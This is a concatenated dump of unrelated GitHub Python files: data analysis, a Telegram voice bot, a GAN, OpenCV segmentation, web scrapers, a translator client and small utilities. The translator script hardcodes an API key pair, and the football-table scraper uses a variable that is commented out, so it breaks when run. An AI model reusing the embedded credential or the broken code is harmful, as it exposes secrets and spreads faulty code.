print(data)\n#\n# # import csv\n# # with open(\"./weather_data.csv\") as weather_data:\n# # data=csv.reader(weather_data)\n# # temps=[]\n# # for row in data:\n# # if row[1]!=\"temp\":\n# # temps.append(int(row[1]))\n# # print(temps)\n#\n# import pandas\n# #total=0\n# data= pandas.read_csv(\"weather_data.csv\")\n# # temp_list=data[\"temp\"].to_list()\n# # for temp in temp_list:\n# # total+=temp\n# # print(total/len(temp_list))\n# # print(data[\"temp\"].mean())\n# # print(data[\"temp\"].max())\n# # print(data[data.temp==data.temp.max()])\n# monday=data[data.day==\"Monday\"]\n# print(monday.temp)\n\n\nimport pandas\ndata=pandas.read_csv(\"2018_Central_Park_Squirrel_Census_-_Squirrel_Data.csv\")\ngreys_count= len(data[data[\"Primary Fur Color\"] == \"Gray\"])\nreds_count= len(data[data[\"Primary Fur Color\"] == \"Cinnamon\"])\nblacks_count= len(data[data[\"Primary Fur Color\"] == \"Black\"])\n\ndata_dict = {\n \"Fur Colour\": [\"Grey\",\"Cinnamon\",\"Black\"],\n \"Count\": [greys_count,reds_count,blacks_count]\n}\ndf = pandas.DataFrame(data_dict)\ndf.to_csv(\"squirrel_count.csv\")\n\n\n","repo_name":"Oliwrm/squirrel-data-practice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"1576952408","text":"import asyncio\nimport logging\nimport sys\n\nfrom aiogram import Bot, Dispatcher, Router, types\nfrom aiogram.filters import Command\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.fsm.state import State, StatesGroup\nimport aiohttp\n\nimport cfg\n\nfrom Recognition import Recognition\n\nfrom translate import translate\n\nfrom OpenAI import generate_dialog\n\nform_router = Router()\nbot = Bot(token=cfg.telegramAPI_TOKEN, parse_mode=\"HTML\")\ncontext = \"Hi, how are you today?\"\n\nasync def download_voice_message(voice_message: types.Voice):\n file_info = await bot.get_file(voice_message.file_id)\n file_url = f\"https://api.telegram.org/file/bot{bot.token}/{file_info.file_path}\"\n\n async with aiohttp.ClientSession() as session:\n async with session.get(file_url) as response:\n if response.status == 200:\n file_data = await response.read()\n with open(f'voice.ogg', 'wb') as f:\n f.write(file_data)\n else:\n print(f'Error downloading file. Status: {response.status}')\n\nclass Form(StatesGroup):\n voice = State()\n@form_router.message(Command(\"voiceChat\"))\nasync def command_start(message: types.message, state: FSMContext) -> None:\n await state.set_state(Form.voice)\n await message.answer('Бот перешел в состояние голосового чата')\n@form_router.message(Command(\"exit\"),Form.voice)\nasync def command_start(message: types.message, state: FSMContext) -> None:\n await state.clear()\n await message.answer('Вы вышли из режима VoiceChat')\n\n@form_router.message(Form.voice)\nasync def command_start(message: types.message, state: FSMContext) -> None:\n global context\n try:\n voice_message = message.voice\n await download_voice_message(voice_message)\n\n # user_input = translate(Recognition(),\"en\")\n #generated_text = generate_dialog(prompt=context + \" \" + user_input,\n # model=\"davinci\",\n #token_max_length=150)\n # context += \" \" + user_input + \" \" + generated_text\n #await message.answer(translate(generated_text,\"ru\"))\n await message.answer(Recognition())\n except:\n await message.answer('Это не голосовое! Выйдите из этого режима командой /exit чтобы общаться текстом')\nasync def main():\n bot = Bot(token=cfg.telegramAPI_TOKEN, parse_mode=\"HTML\")\n dp = Dispatcher()\n dp.include_router(form_router)\n\n await dp.start_polling(bot)\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n asyncio.run(main())","repo_name":"NiXbi-L/OpenAI_dialog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35898587148","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 5 15:35:53 2022\r\n\r\n@author: Admin\r\n\r\nDescription:\r\nNew file to hold all of the functions for the GAN\r\nMakes main file more easily readable\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom numpy import zeros\r\nfrom numpy import ones\r\nfrom numpy import vstack\r\nfrom numpy import hstack\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.layers import Reshape\r\nfrom tensorflow.keras.layers import Flatten\r\nfrom tensorflow.keras.layers import Conv2D\r\nfrom tensorflow.keras.layers import Conv2DTranspose\r\nfrom tensorflow.keras.layers import ZeroPadding2D\r\nfrom tensorflow.keras.layers import LeakyReLU\r\nfrom tensorflow.keras.layers import Dropout\r\nfrom tensorflow_addons.layers import SpectralNormalization\r\nimport matplotlib.pyplot as plt\r\n\r\n#%% Define model function\r\n\r\ndef define_generator(latent_dim):\r\n model = Sequential()\r\n # foundation for 2x50 points\r\n N = 1024\r\n n_nodes = N * 2 * 25\r\n \r\n # Layer 1 - Dense nodes\r\n model.add(SpectralNormalization(Dense(n_nodes, input_dim=latent_dim)))\r\n model.add(LeakyReLU(alpha=0.2))\r\n model.add(Reshape((2, 25, N)))\r\n \r\n # Layer 2 - Upsample from (2,25) --> (2,50)\r\n model.add(SpectralNormalization(Conv2DTranspose(N, (2,4), strides=(1,2), padding='same')))\r\n model.add(LeakyReLU(alpha=0.2))\r\n \r\n # Layer 3 - Upsample from (2,50) --> (2,100)\r\n model.add(SpectralNormalization(Conv2DTranspose(N/4, (2,4), strides=(1,2), padding='same')))\r\n model.add(LeakyReLU(alpha=0.2))\r\n \r\n # Layer 4 - Upsample from (2,100) --> (2,200)\r\n model.add(SpectralNormalization(Conv2DTranspose(N/16, (2,4), strides=(1,2), padding='same')))\r\n model.add(LeakyReLU(alpha=0.2))\r\n \r\n # Layer 5 - 1 filter looking all the points\r\n model.add(SpectralNormalization(Conv2D(1, (2,2), padding='same'))) \r\n model.add(LeakyReLU(alpha=0.2))\r\n \r\n model.trainable = True\r\n \r\n return model\r\n\r\n#%% Define discriminator\r\ndef define_discriminator(in_shape=(2,200,1)):\r\n model = Sequential()\r\n N = 256\r\n model.add(Conv2D(N, (2,4), strides=(2, 2), padding='same', input_shape=in_shape))\r\n model.add(LeakyReLU(alpha=0.2))\r\n model.add(Dropout(0.4))\r\n model.add(Conv2D(N, (2,4), strides=(2, 2), padding='same'))\r\n model.add(LeakyReLU(alpha=0.2))\r\n model.add(Dropout(0.4))\r\n model.add(Flatten())\r\n model.add(Dense(1, activation='sigmoid'))\r\n \r\n # compile model\r\n opt = Adam(learning_rate=0.0001, beta_1=0.5)\r\n model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])\r\n \r\n return model\r\n\r\n#%% create the combined model\r\ndef define_gan(g_model, d_model):\r\n # make weights in the discriminator untrainable\r\n d_model.trainable = False\r\n \r\n #connect them\r\n model = Sequential()\r\n model.add(g_model)\r\n model.add(d_model)\r\n \r\n # compile model\r\n opt = Adam(learning_rate=0.0001, beta_1=0.5)\r\n model.compile(loss='binary_crossentropy', optimizer=opt)\r\n \r\n return model\r\n\r\n#%% randomly select airfoils to be in real and fake dataset\r\ndef SplitDataset(AirfoilNum,batchSize,n_epochs,unrolling_steps):\r\n batchNum = int(AirfoilNum/batchSize)\r\n halfBatch = int(batchSize/2)\r\n batch = np.zeros([batchNum+unrolling_steps, batchSize, n_epochs])\r\n Num = np.array(list(range(0,AirfoilNum)))\r\n for b in range(0,n_epochs):\r\n np.random.shuffle(Num)\r\n AirfoilIDs = hstack((Num, np.random.randint(0,AirfoilNum-1,unrolling_steps*batchSize)))\r\n batch[:,:,b] = AirfoilIDs.reshape(batchNum+unrolling_steps,batchSize)\r\n \r\n real = batch[:,0:halfBatch,:]\r\n fake = batch[:,halfBatch:batchSize,:]\r\n\r\n return real.astype(int), fake.astype(int)\r\n\r\n#%% creating a dataset from MNIST images with class label as 1\r\ndef generate_real_samples(dataset, realSet):\r\n \r\n # choose random instances\r\n X = np.zeros([len(realSet), 2, 200,1])\r\n for r in range(len(realSet)):\r\n X[r, :, :,:] = dataset[realSet[r], :, :].reshape([1, 2, 200, 1])\r\n \r\n # generate 'real' class labels (1)\r\n y = ones((len(realSet), 1))\r\n return X, y\r\n\r\n#%% create input for Generator (generate points in latent space for G)\r\ndef generate_latent_points(dataset, fakeSet, dataNum):\r\n \r\n # generate points in the latent space\r\n x_input = np.zeros([len(fakeSet), dataNum])\r\n for f in range(len(fakeSet)):\r\n dataPoints = dataset[fakeSet[f], :]\r\n dataPoints = dataPoints.reshape(1,dataPoints.size)\r\n noise = (tf.random.normal([1,100])).numpy()\r\n x_input[f,:] = hstack((dataPoints,noise))\r\n \r\n return x_input\r\n\r\n#%% creating fake dataset for discriminator (use G to make fake examples)\r\ndef generate_fake_samples(g_model, dataset, fakeSet, dataNum): \r\n #generate points in latent space\r\n x_input = generate_latent_points(dataset, fakeSet, dataNum)\r\n \r\n #predict outputs\r\n X = g_model.predict(x_input)\r\n half_batch = int(len(fakeSet))\r\n \r\n # create 'fake' class labels (0)\r\n y = zeros((len(fakeSet), 1))\r\n return X.reshape([half_batch,2,200,1]), y\r\n\r\n#%% Training method GAN\r\ndef train(g_model, d_model, gan_model, C_data, P_data, dataNum, unrolling_steps, n_epochs=1000, n_batch=int(16)):\r\n \r\n #define batch per epoch and split dataset for all epochs\r\n bat_per_epo = int(C_data.shape[0]/n_batch)\r\n reals, fakes = SplitDataset(C_data.shape[0], n_batch, n_epochs, unrolling_steps)\r\n \r\n # Create a seed for plotting airfoil after each epoch\r\n inputData = hstack((P_data[0,:].reshape(1,100),(tf.random.normal([1,100])).numpy()))\r\n seed = tf.convert_to_tensor(inputData)\r\n \r\n #initialize arrays for loss\r\n d_loss = np.zeros([bat_per_epo,1]) # Loss throughout each epoch\r\n g_loss = np.zeros([bat_per_epo,1])\r\n g_lossLog = [] # Average loss for each epoch\r\n d_lossLog = []\r\n #initialize font for plots\r\n font2 = {'family' : 'Times New Roman','weight' : 'normal','size' : 14,}\r\n \r\n for i in range(n_epochs):\r\n for j in range(bat_per_epo):\r\n #unrolled training for discriminator\r\n for k in range(unrolling_steps):\r\n # create real and fake samples and then combine\r\n X_real, y_real = generate_real_samples(C_data, reals[j+k,:,i])\r\n X_fake, y_fake = generate_fake_samples(g_model, P_data, fakes[j+k,:,i], dataNum)\r\n X, y = vstack((X_real, X_fake)), vstack((y_real, y_fake))\r\n\r\n if k==0:# save weights \r\n d_loss[j], _ = d_model.train_on_batch(X, y)\r\n d_weights = d_model.get_weights()\r\n else:\r\n loss, _ = d_model.train_on_batch(X, y)\r\n \r\n # prepare points in latent space as input for the generator\r\n batch = np.concatenate((reals[j,:,i],fakes[j,:,i]))\r\n X_gan = generate_latent_points(P_data, batch, dataNum)\r\n y_gan = ones((n_batch, 1)) #invert fake sample label\r\n \r\n # update the generator via the discriminator's error\r\n g_loss[j] = gan_model.train_on_batch(X_gan, y_gan)\r\n \r\n #reset d_model weights back to one iteration of training\r\n d_model.set_weights(d_weights)\r\n \r\n \r\n '''\r\n # USED FOR OBSERVING SPIKES IN LOSS CURVE\r\n if i>=50:\r\n # Plot G prediction\r\n prediction = g_model(seed, training=False)\r\n plt.figure(figsize=(20,8))\r\n plt.plot(prediction[0,0,:,0],prediction[0,1,:,0])\r\n plt.xlim(0,1)\r\n plt.ylim(0.5,1.5)\r\n plt.grid(True)\r\n plt.xlabel('X axis (% chord)',font2)\r\n plt.ylabel('Y axis (% chord)',font2)\r\n plt.title('Epoch #'+str(i)+' Prediction',font2)\r\n plt.show()\r\n \r\n # Plot zoomed in version of the loss curve\r\n plt.figure(figsize=(20,8))\r\n plt.plot(range(i-50,i),g_lossLog[i-50:i],'r',label='Generator Loss')\r\n plt.plot(range(i-50,i),d_lossLog[i-50:i],'b',label='Discriminator Loss')\r\n plt.legend(loc=0)\r\n plt.xlabel('Epoch')\r\n plt.ylabel('Loss')\r\n plt.title('Loss in Epochs '+str(i-50)+'-'+str(i))\r\n plt.show()\r\n \r\n \r\n if np.remainder(i+1,50)==1:\r\n SaveLoc = 'Models\\\\GANmodel_recent\\\\Model\\\\E'+str(i+1)\r\n g_model.build((None,1,200))\r\n g_model.save(SaveLoc)\r\n '''\r\n \r\n # summarize loss on this epoch\r\n if i==0:\r\n # setup for ouputs\r\n print(' Epoch | D loss avg | G loss avg')\r\n print('----------+------------+------------')\r\n \r\n DLavg = np.sum(d_loss)/bat_per_epo\r\n GLavg = np.sum(g_loss)/bat_per_epo\r\n print('{0:4d}/{1:4d} | {2:1.4f} | {3:1.4f}'.format(i+1,n_epochs,DLavg,GLavg))\r\n \r\n # record loss over epochs\r\n g_lossLog.append(GLavg)\r\n d_lossLog.append(DLavg)\r\n \r\n # plot the loss curve over epochs\r\n plt.figure(figsize=(10,4))\r\n plt.plot(range(0,i+1),g_lossLog,'r',label='Generator Loss')\r\n plt.plot(range(0,i+1),d_lossLog,'b',label='Discriminator Loss')\r\n plt.legend(loc=0)\r\n plt.xlabel('Epochs',font2)\r\n plt.ylabel('Loss',font2)\r\n plt.show()\r\n \r\n","repo_name":"EckleyZ/AirfoilGAN","sub_path":"GANfuncs_Iter5.py","file_name":"GANfuncs_Iter5.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"29173073227","text":"#https://www.pyimagesearch.com/2017/02/20/text-skew-correction-opencv-python/\r\nimport cv2\r\nimport numpy as np\r\nimport sys\r\nsys.setrecursionlimit(100000)\r\n\r\ndef Flood(image, index, label, x, y, i):\r\n #The coordinate of first pixel is (x,y); The index of component is i\r\n (height, width)=image.shape[:2]\r\n list=[[x,y]]\r\n while (not list) == False:\r\n cx, cy = list.pop()\r\n index[cx, cy] = i\r\n label[cx, cy] = 1\r\n pixel = image[cx, cy]\r\n if cx - 1 >= 0 and index[cx - 1, cy] == 0 and image[cx - 1, cy] == pixel:\r\n list.append([cx - 1, cy])\r\n #Flood(image, index, x - 1, y, i, c, height, width)\r\n if cx + 1 < height and index[cx + 1, cy] == 0 and image[cx + 1, cy] == pixel:\r\n list.append([cx + 1, cy])\r\n #Flood(image, index, x + 1, y, i, c, height, width)\r\n if cy - 1 >= 0 and index[cx, cy - 1] == 0 and image[cx, cy - 1] == pixel:\r\n list.append([cx, cy - 1])\r\n #Flood(image, index, x, y - 1, i, c, height, width)\r\n if cy + 1 < width and index[cx, cy + 1] == 0 and image[cx, cy + 1] == pixel:\r\n list.append([cx, cy + 1])\r\n #Flood(image, index, x, y + 1, i, c, height, width)\r\n return index, label\r\n\r\ndef fourCornersSort(pts):\r\n \"\"\" Sort corners: top-left, bot-left, bot-right, top-right\r\n # Difference and sum of x and y value\r\n # Inspired by http://www.pyimagesearch.com\r\n diff = np.diff(pts, axis=1)\r\n summ = pts.sum(axis=1)\r\n\r\n # Top-left point has smallest sum...\r\n # np.argmin() returns INDEX of min\r\n return np.array([pts[np.argmin(summ)],\r\n pts[np.argmax(diff)],\r\n pts[np.argmax(summ)],\r\n pts[np.argmin(diff)]])\"\"\"\r\n max = np.max(pts, axis=0)\r\n min = np.min(pts, axis=0)\r\n topleft = np.array([min[0], min[1]])\r\n #topright = np.array([min[0], max[1]])\r\n #bottomleft = np.array([max[0], min[1]])\r\n bottomright = np.array([max[0], max[1]])\r\n return np.array([topleft,bottomright])\r\n\r\nif __name__ == '__main__':\r\n # Reading the input image\r\n img = cv2.imread('post_skew.png', 0)\r\n (h, w) = img.shape[:2]\r\n # Taking a matrix of size 5 as the kernel\r\n kernel = np.ones((5, 5), np.uint8)\r\n #gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n gray = cv2.bitwise_not(img)\r\n\r\n # threshold the image, setting all foreground pixels to 255 and all background pixels to 0\r\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n img_dilation = cv2.dilate(thresh, kernel, iterations=10)\r\n blur = cv2.GaussianBlur(img_dilation, (5, 5), 0)\r\n thresh = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n cv2.imwrite(\"binary_resultprojectivetrans.jpg\", thresh)\r\n\r\n #REQUIRE_GROUPING=img_dilation\r\n LABELED_OR_NOT=np.zeros([h,w])\r\n PIXEL_GROUP=np.zeros([h,w])\r\n\r\n\r\n #sum=0\r\n for i in range(h):\r\n for j in range(w):\r\n if thresh[i][j]==0:\r\n LABELED_OR_NOT[i][j] = 1\r\n #sum=sum+1\r\n\r\n\r\n num=0 #The index of component\r\n #while True:\r\n #r1 = np.int(np.random.random() * h) - 1\r\n #r2 = np.int(np.random.random() * w) - 1\r\n for r1 in range(h):\r\n for r2 in range(w):\r\n if LABELED_OR_NOT[r1][r2] == 0:\r\n print(r1,r2)\r\n num = num + 1\r\n print(num)\r\n PIXEL_GROUP, LABELED_OR_NOT=Flood(thresh, PIXEL_GROUP, LABELED_OR_NOT, r1, r2, num)\r\n\r\n\r\n '''\r\n cv2.namedWindow('Dilation', 0)\r\n cv2.imshow(\"Dilation\", img_dilation)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()'''\r\n list=[]\r\n point=[]\r\n for i in range(num):\r\n list.append([])\r\n point.append([])\r\n\r\n for i in range(h):\r\n for j in range(w):\r\n if PIXEL_GROUP[i][j] != 0:\r\n list[int(PIXEL_GROUP[i][j])-1].append([i,j])\r\n\r\n print(len(list))\r\n for i in range(num):\r\n point[i]=fourCornersSort(np.array(list[i]))\r\n\r\n\r\n cv2.imwrite(\"resultblock.jpg\", img)\r\n\r\n\r\n binary = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\r\n rowsplit = []\r\n for i in range(num):\r\n rowsplit.append([])\r\n threshold = 240\r\n for s in range(num):\r\n rowflag = 1\r\n for i in range(point[s][0][0], point[s][1][0]):\r\n sum = 0\r\n count = point[s][1][1] - point[s][0][1]\r\n for j in range(point[s][0][1], point[s][1][1]):\r\n sum = sum + binary[i][j]\r\n print(sum / count)\r\n if sum / count > threshold and rowflag == 0:\r\n continue\r\n elif sum / count > threshold and rowflag == 1: # just get out of the block\r\n rowsplit[s].append(i)\r\n rowflag = 0\r\n cv2.line(img, (point[s][0][1], i), (point[s][1][1], i), (0, 0, 0), 1)\r\n continue\r\n elif sum / count <= threshold and rowflag == 0: # just get into the block\r\n rowsplit[s].append(i)\r\n rowflag = 1\r\n cv2.line(img, (point[s][0][1], i), (point[s][1][1], i), (0, 0, 0), 1)\r\n continue\r\n else:\r\n continue\r\n for i in range(num):\r\n cv2.rectangle(img, (tuple(point[i][0])[1], tuple(point[i][0])[0]),\r\n (tuple(point[i][1])[1], tuple(point[i][1])[0]), 3)\r\n\r\n cv2.imwrite(\"resultsplitpaper.jpg\", img)","repo_name":"yunjuanwang/OCR-character-detection","sub_path":"slant.py","file_name":"slant.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"30666916309","text":"# check py verion\n# check requests library\n# make query string\n\nimport json\nimport requests\nimport sys\n\nurl = \"http://fanyi.youdao.com/openapi.do\"\n\nconfigFile = \"config.json\"\ndef config(keyfrom,key):\n \"\"\"config key to config.json file\"\"\"\n payload = {\n \"keyfrom\":keyfrom,\n \"key\":key,\n \"type\":\"data\",\n \"doctype\":\"json\",\n \"version\":\"1.1\",\n }\n with open(configFile,\"w\") as cf:\n cf.write(json.dumps(payload))\n\n\ndef query(word):\n \"\"\"query word\"\"\"\n with open(configFile) as cf:\n payload = json.loads(cf.read())\n\t \n payload[\"q\"] = word\n resp = requests.get(url,params=payload)\n return resp.text\n# config(\"myiosworkflow\",\"884997728\")\n\ndef Query(word):\n\tpayload = {\n \"keyfrom\":\"myiosworkflow\",\n \"key\":\"884997728\",\n \"type\":\"data\",\n \"doctype\":\"json\",\n \"version\":\"1.1\",\n\t\t \"q\":word\n }\n\tresp = requests.get(url,params=payload)\n\tjsonObj = json.loads(resp.text)\n\treturn json.dumps(jsonObj,indent=4,ensure_ascii=False)\n\t#return resp.text\nprint(Query(sys.argv[1]))","repo_name":"sunliang711/alfredsync","sub_path":"Alfred.alfredpreferences/workflows/user.workflow.926FBC3E-D185-4154-9F58-FE9E02676ED8/yd.py","file_name":"yd.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1507036616","text":"class ClockController:\n def __init__(self, display):\n self._display = display\n self._state = ClockState(' ', ' ', ' ', ' ', colon=False)\n\n def update(self, digit0, digit1, digit2, digit3, colon=False):\n new_state = ClockState(digit0, digit1, digit2, digit3, colon)\n is_change = self._state.render_delta(new_state, self._display)\n self._state = new_state\n\n def get_state(self):\n return self._state\n\nclass ClockState:\n '''Treat this type as if it were immutable.'''\n def __init__(self, digit0, digit1, digit2, digit3, colon):\n # All values are taken from SevenSegment.DIGIT_VALUES.\n # Because we do not use decimal values, we do not store\n # a state for it.\n self.digit0 = digit0\n self.digit1 = digit1\n self.digit2 = digit2\n self.digit3 = digit3\n self.colon = colon\n\n def render_delta(self, new_state, display):\n is_change = False\n if self.digit0 != new_state.digit0:\n display.set_digit(0, new_state.digit0)\n is_change = True\n if self.digit1 != new_state.digit1:\n display.set_digit(1, new_state.digit1)\n is_change = True\n if self.digit2 != new_state.digit2:\n display.set_digit(2, new_state.digit2)\n is_change = True\n if self.digit3 != new_state.digit3:\n display.set_digit(3, new_state.digit3)\n is_change = True\n if self.colon != new_state.colon:\n display.set_colon(new_state.colon)\n is_change = True\n\n if is_change:\n display.write_display()\n return is_change\n","repo_name":"bolinfest/rpi-clock","sub_path":"src/segment7-service/ClockController.py","file_name":"ClockController.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18898588643","text":"import argparse\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport locale\nfrom pymongo import MongoClient\nimport requests\nimport time\nimport tqdm\nimport traceback\n\nfrom modules import common\n\nTOTAL_PAGES = 10\nPOSTS_PER_PAGE = 40\nDELAY = 0.5\n\n# Загружает список новостей\ndef load_news(page):\n url = f'https://vlg-media.ru/wp-admin/admin-ajax.php?posts_per_page={POSTS_PER_PAGE}&page={page}&offset=0&order=DESC&orderby=date&action=alm_get_posts'\n r = requests.get(url)\n return r.json()\n\n# Парсит список новостей\ndef parse_news_list(html):\n # Парсим HTML\n soup = BeautifulSoup(html, 'lxml')\n news_tags = soup.find_all('li', class_='alm-item')\n\n parsed_news = []\n\n # Проходим по всем новостям\n for news_tag in news_tags:\n\n # Находим элемементы в разметке новости\n link_tag = news_tag.find('a')\n date_tag = news_tag.find('p', class_='entry-meta')\n date = datetime.strptime(date_tag.text, '%d %B, %Y')\n url =link_tag['href']\n # Добавляем запись\n news_item = {\n '_id': url, # используем URL в качестве ID\n 'title': link_tag.text,\n 'url': url,\n 'date': date\n }\n parsed_news.append(news_item)\n\n return parsed_news\n\n# Получает список новостей\ndef get_news_list(page):\n json = load_news(page)\n html = json['html']\n news = parse_news_list(html)\n return news\n\n# Загружает страницу новости\ndef load_news_details(url):\n r = requests.get(url)\n return r.text\n\n# Парсит страницу новости\ndef parse_news_details(news, html):\n soup = BeautifulSoup(html, 'lxml')\n article_tag = soup.find('article')\n short_text_tag = article_tag.find('p', class_='uk-text-lead')\n text_tag = article_tag.find('div', class_='entry-content')\n\n # Текст разделен на несколько тегов

        \n # Найдем все и соединим\n p_tags = text_tag.find_all('p')\n p_texts = [p.text for p in p_tags]\n text = ' '.join(p_texts)\n\n news['short_text'] = short_text_tag.text\n news['text'] = text\n\n# Поулчает дополнительную информацию о новости со страницы новости\ndef get_news_details(news):\n html = load_news_details(news['url'])\n parse_news_details(news, html)\n\n# Получает новости с заданной страницы\ndef get_news(page):\n news = get_news_list(page)\n for item in news:\n time.sleep(DELAY)\n get_news_details(item)\n\n return news\n\ndef insert_or_update(collection, news):\n for item in news:\n collection.update_one(\n {\"_id\": item['_id']},\n {'$set': item},\n upsert=True\n )\n\ndef main():\n # Устанавливаем русскую локаль для парсинга даты\n locale.setlocale(locale.LC_TIME, 'ru_RU.UTF-8')\n db = common.get_db()\n news_cl = db['news']\n\n for page in tqdm.tqdm(range(cfg.pages)):\n try:\n news = get_news(page)\n insert_or_update(news_cl, news)\n except:\n print(traceback.format_exc())\n\n\n# Парсинг аргументов командной строки\ndef parse_args():\n parser = argparse.ArgumentParser(description='Parse news from web site')\n parser.add_argument('-p', '--pages', type=str, default=TOTAL_PAGES,\n help='Number of pages to parse')\n\n return parser.parse_args()\n\nif __name__ == '__main__':\n cfg = parse_args()\n main()\n","repo_name":"baaazik/compling_kr","sub_path":"src/news_parser.py","file_name":"news_parser.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15450500912","text":"#!/usr/bin/env python3\n\nimport yfinance as yf\nimport os\nimport sys\nimport json\ninput_file = \"stocks.lst\"\noutput_file = \"report.csv\"\ndata_dir = \"./data\"\n\nif not os.path.exists(input_file):\n print(\"Input file %s not found\" % input_file)\n sys.exit(1)\n\n# Pull out interesting fields\nfields = [\n 'symbol',\n 'shortName',\n 'sector',\n 'industry',\n 'recommendationKey',\n 'currentPrice',\n 'shortRatio',\n 'fullTimeEmployees',\n 'marketCap',\n 'totalRevenue',\n 'revenueGrowth',\n 'ebitdaMargins',\n 'profitMargins',\n 'grossMargins',\n 'earningsGrowth',\n 'dividendYield',\n 'debtToEquity',\n 'forwardEps',\n 'trailingEps',\n 'trailingEps',\n 'forwardPE',\n 'pegRatio',\n]\n\n\nwith open(input_file, \"r\", encoding=\"utf-8\") as fh_tickers:\n with open(output_file, \"w\", encoding=\"utf-8\") as fh_report:\n # generate header\n record_line = ';'.join(fields)\n record_line += '\\n'\n fh_report.write(record_line)\n\n # loop through list of tickers\n while True:\n ticker = fh_tickers.readline().rstrip()\n if not ticker:\n break\n print(ticker)\n ticker_file = os.path.join(data_dir, '{0}.json'.format(ticker))\n if not os.path.exists(ticker_file):\n print(\"ticket data file not found: %s\" % ticker_file)\n print('Run \"./get_one.py {0}\" or \"./refresh-data.py\"'.format(ticker))\n continue\n\n # read and parse ticker data file\n json_data = open(ticker_file, \"r\", encoding=\"utf-8\").read()\n ticker_data = json.loads(json_data)\n\n # test data is valid\n if \"shortName\" not in ticker_data:\n print(\"data file is invalid and will be skipped (shortName not found): %s\" % ticker_file)\n continue\n\n # build record from fields\n record_list = []\n for field in fields:\n if field in ticker_data:\n record_list.append(str(ticker_data[field]))\n else:\n record_list.append(\"\")\n\n # write report line\n record_line = ';'.join(record_list)\n record_line += \"\\n\"\n fh_report.write(record_line)\n\n","repo_name":"msgarbossa/stock-research","sub_path":"create-csv.py","file_name":"create-csv.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31340374071","text":"from selenium.common.exceptions import NoSuchElementException\n\n\ndef scrape_team_row(driver, team_row):\n\tleague_position = f'{team_row}/td[2]/span[1]'\n\tteam_name = f'{team_row}/td[3]'\t\n\tplayed = f'{team_row}/td[4]'\n\twon = f'{team_row}/td[5]'\n\tdrawn = f'{team_row}/td[6]'\n\tlost = f'{team_row}/td[7]'\n\tgoals_for = f'{team_row}/td[8]'\n\tgoals_against = f'{team_row}/td[9]'\n\tgoal_difference = f'{team_row}/td[10]'\n\tpoints = f'{team_row}/td[11]'\n\t\n\t#elems = [league_position, team_name, played, won, drawn, lost, goals_for, goals_against, goal_difference, points]\n\t#data = []\n\t#for elem in elems:\n\t\t#data.append(driver.find_element_by_xpath(elem).text)\n\t\n\tdata = [driver.find_element_by_xpath(elem).text for elem in elems]\n\t\n\tstats = {\n\t\t'league_position': data[0],\n\t\t'team_name': data[1],\n\t\t'played': data[2],\n\t\t'won': data[3],\n\t\t'drawn': data[4],\n\t\t'lost': data[5],\n\t\t'goals_for': data[6],\n\t\t'goals_against': data[7],\n\t\t'goal_difference': data[8],\n\t\t'points': data[9],\n\t}\n\treturn stats\n\t\n\ndef gather_team_stats(driver):\n\tteam_results = []\n\tchecking = True\n\tx = 1\n\twhile checking:\n\t\ttry:\n\t\t\tteam_row = f'//*[@id=\"mainContent\"]/div/div[1]/div[3]/div/div/div/table/tbody/tr[{x}]'\n\t\t\t\t\t\t\n\t\t\tstats = scrape_team_row(driver, team_row)\n\t\t\tteam_results.append(stats)\n\t\t\tx += 2\n\t\texcept NoSuchElementException:\n\t\t\tchecking = False\n\treturn team_results\n","repo_name":"hartleyn/fb_scraper","sub_path":"pl_table_scraper.py","file_name":"pl_table_scraper.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29249528532","text":"class Solution:\n def numberOfPairs(self, nums: List[int]) -> List[int]:\n num_freq = Counter(nums)\n \n res = [0, 0]\n \n for v in num_freq.values():\n res[0] += (v // 2)\n res[1] += (v % 2)\n \n return res","repo_name":"shivaAcharya/LeetCode","sub_path":"2341-maximum-number-of-pairs-in-array/2341-maximum-number-of-pairs-in-array.py","file_name":"2341-maximum-number-of-pairs-in-array.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24844483939","text":"# vi:set sw=4 ts=4 expandtab:\n# -*- coding: utf8 -*-\n\nimport sys\n\nsys.path.insert(0, 